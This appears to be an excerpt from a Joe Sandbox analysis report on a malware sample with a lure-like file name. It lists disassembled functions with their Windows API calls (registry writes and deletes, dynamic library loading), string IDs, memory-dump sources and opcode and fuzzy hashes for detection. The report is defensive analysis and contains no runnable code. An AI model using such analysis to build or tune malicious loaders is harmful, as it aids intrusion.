                                                                                                                                                                                                                          • Instruction ID: b3254d88aebf37d11d8c7362002191d58d549b74aa0b12ea023da1ca5ce0478c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36670ec199ee9b6dfad8f4a6b6b31581e8d9c48027d88929eec7ba2c2c4230c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F41C871A04515BADF107BB5CC45EAF3669DF41329F20823BF112F11E2DA3C4A419B6D
                                                                                                                                                                                                                          Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          • Opcode ID: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction ID: 77b923b5c768d409b2d5e956d577938eeee851e691c4f647a4d397fc18f4a02c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10113D71A00108BEDF229F90DE89DAE3B7DEB54349B504436FA01F10A0D775AE51DB69
                                                                                                                                                                                                                          Function 00111B90 Relevance: 7.6, Strings: 6, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$T$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-273400982
                                                                                                                                                                                                                          • Opcode ID: a44de4e0901cb65758f58f1f026dc92145ff35e1cc9457eccb72f5d022749f3c
                                                                                                                                                                                                                          • Instruction ID: 0e5d78d2b076c2611cfed745f202bea00ac5b329545188f5ffb6853a63ed1911
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a44de4e0901cb65758f58f1f026dc92145ff35e1cc9457eccb72f5d022749f3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75216034E00248AFD709EFB4C4527EDB7B2EF85304F4084BA94559B395DB795A85CF82
                                                                                                                                                                                                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: 845c9a3ca6c3eb3d87070d4cabb74cb02a5cb74176c4da131312543beb8ccc64
                                                                                                                                                                                                                          • Instruction ID: 593f524f0f56d60e1fc11a8a6bbc9e15f3312f291ea64c997066006724e53d58
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845c9a3ca6c3eb3d87070d4cabb74cb02a5cb74176c4da131312543beb8ccc64
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF03CB2A04114AFEB01ABE4DE88CAF77BCEB54301B004476F601F6190C7749D018B79
                                                                                                                                                                                                                          Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                                          • Opcode ID: 934ac727ed26cce9d36a2a29c825db931d3237c7f30b43815e60a06d3d00d0c6
                                                                                                                                                                                                                          • Instruction ID: 9e7a7182ae9254896fc63aeedc32ca6a3ce3e3ef4d7c41cc1e10fd7b3e73fcff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 934ac727ed26cce9d36a2a29c825db931d3237c7f30b43815e60a06d3d00d0c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59016232944340AFE7016B70AE5EBA93FA89795305F10C475F201B62E2C57801569F7F
                                                                                                                                                                                                                          Function 004046D7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041FD20,0041FD20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0041FD20), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                          • Opcode ID: 237ba65d13aee49a15e6db87fc30394a63326bd4b6ae992c739a23ec13e2d8da
                                                                                                                                                                                                                          • Instruction ID: fde7fbcda73e06f71546803af61accc205d2577e4f834e35a140aa318663f7c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 237ba65d13aee49a15e6db87fc30394a63326bd4b6ae992c739a23ec13e2d8da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411E773A0412877DB10666D9C45EAF3288DB86374F254237FA26F31D1EA788C1281F8
                                                                                                                                                                                                                          Function 001119F7 Relevance: 6.3, Strings: 5, Instructions: 90COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: b0e8e22d04040b876249dd68622147038610218a8ae79d2919e1a11549bc39b8
                                                                                                                                                                                                                          • Instruction ID: aff38579c553cfa6854c9bc23dba9a8cf924928a1d89d7d11fe2bd6931b97a50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e8e22d04040b876249dd68622147038610218a8ae79d2919e1a11549bc39b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6316F74E042499FCB09DFB4C4516EEBBB2AF89304F104479D444AB395DB755A81CF91
                                                                                                                                                                                                                          Function 001117B9 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: 3cb685402b343c82c796081d8a53f667fa4a29188064b354827ce321e79e334d
                                                                                                                                                                                                                          • Instruction ID: a0a67c404996c23ada62de65100dd7d71aa46ee094a8fcdab483b05c94d87ac0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb685402b343c82c796081d8a53f667fa4a29188064b354827ce321e79e334d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D218134E04248AFD70ADFB5C4127EDBBB2EF8A304F1084BA94559B396DB785941CF52
                                                                                                                                                                                                                          Function 001118A9 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: edab78aea3a08e5d3fda3b03e3da1f6b691e6a4ac5c120be379eb670ac22eaab
                                                                                                                                                                                                                          • Instruction ID: fd147eee989cb3d1c72ff860c934cc74080046272f6d378973570a4c502ebd44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edab78aea3a08e5d3fda3b03e3da1f6b691e6a4ac5c120be379eb670ac22eaab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97217134E04308AFDB0ADBB5C4126EDBBB1EF86304F4084BAD4549B395DB795982CF51
                                                                                                                                                                                                                          Function 00111D70 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: 0ba2b14810e2b34b7d51102c4b644f86a713d4d115e2a08955cca9abd1f002c7
                                                                                                                                                                                                                          • Instruction ID: a34ff573a54588a1f7e2edd71153dfe8ab7f2740c6253e9779e5b906bc45b635
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ba2b14810e2b34b7d51102c4b644f86a713d4d115e2a08955cca9abd1f002c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE219134A00248AFD70ADFF5C4026EDBBB2EF86304F1084BA94449B395DB785985CF41
                                                                                                                                                                                                                          Function 00112221 Relevance: 6.3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: c60a2664316001943a862c06a6f819f9cc27d9815d0b32766b586077da52ba07
                                                                                                                                                                                                                          • Instruction ID: 8aff8a9cc50d6b2db65cc29ec4ed933cc8f584d458f611956e076acbcfd67f4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c60a2664316001943a862c06a6f819f9cc27d9815d0b32766b586077da52ba07
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4217134E042489FD709DBB4C4026ADBBB2EF86304F0484BAD4049B395CB795A81CF52
                                                                                                                                                                                                                          Function 00111C80 Relevance: 6.3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: dcfeb6b1acfc5948e6e3f00cdb830a5098d6651c4b312c76e2c1525f8e4d0ec9
                                                                                                                                                                                                                          • Instruction ID: ac5b7daaa9800a68ee8dcbfeeda34bbf698c247e673c9d83875477b550d03cbd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcfeb6b1acfc5948e6e3f00cdb830a5098d6651c4b312c76e2c1525f8e4d0ec9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24216D34A00208AFDB0AEFB5C4127EDBBB1AF86304F1084BA94459B395DB795A45CF41
                                                                                                                                                                                                                          Function 00111E60 Relevance: 6.3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: 5bdb5be18d94caf00475f375cc76d9bba9471d0db9bb82e6013787f9eb1ab5d2
                                                                                                                                                                                                                          • Instruction ID: 6cfa98876088333bd2750e75b83074a84c9b99f873d2ec434b6942be91acc3a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bdb5be18d94caf00475f375cc76d9bba9471d0db9bb82e6013787f9eb1ab5d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04217F34A05208AFD70ADFB5C4017DDBBB1EF8A304F4084BA9444AB395DB785A46CF41
                                                                                                                                                                                                                          Function 00111F50 Relevance: 6.3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: 57748917066c2eda807b5adb14453bf2e3300c50f0ea68cc726d8c99b3dd9877
                                                                                                                                                                                                                          • Instruction ID: d3535dbb99b3167f63c5169285098fdd4489425588499ed0167655f87638f6d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57748917066c2eda807b5adb14453bf2e3300c50f0ea68cc726d8c99b3dd9877
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47216D34A002089FD70ADBB4C4127EDBBB1EF8A304F1085BAD044AB395DB795A46CF41
                                                                                                                                                                                                                          Function 00112041 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: 6ad21d3802a3ac8f6b89f6824044f82f8608474092e18ee699ac8bcf27354d81
                                                                                                                                                                                                                          • Instruction ID: 9dce9a74000853df788f02d5dac75376a27bd1519bb17ee5d7e32480757e5248
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ad21d3802a3ac8f6b89f6824044f82f8608474092e18ee699ac8bcf27354d81
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79217134E042089FD70ADBB4C4026EEBBF1AF8A304F5084BAD0449B395CB785A41CF41
                                                                                                                                                                                                                          Function 00112130 Relevance: 6.3, Strings: 5, Instructions: 66COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: f615e419b0692e035778504c0a98abca38ba84bd7af45db694ec057076256428
                                                                                                                                                                                                                          • Instruction ID: a81a896e53e0a08fe83df88be45480f0a516377cfc413c12a033e59aafe60638
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f615e419b0692e035778504c0a98abca38ba84bd7af45db694ec057076256428
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25217F34E04208AFDB09DFB4C4416EEBBB2EF8A304F1085BAD00597395DB785A85CF42
                                                                                                                                                                                                                          Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00401FBB
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                                          • Opcode ID: 2b30b5f6382e984e85022a8f1f2fd2ed0a9551c46cb845ede73f55fd13b9698d
                                                                                                                                                                                                                          • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b30b5f6382e984e85022a8f1f2fd2ed0a9551c46cb845ede73f55fd13b9698d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                                                                                                                                                                                          Function 00402364 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
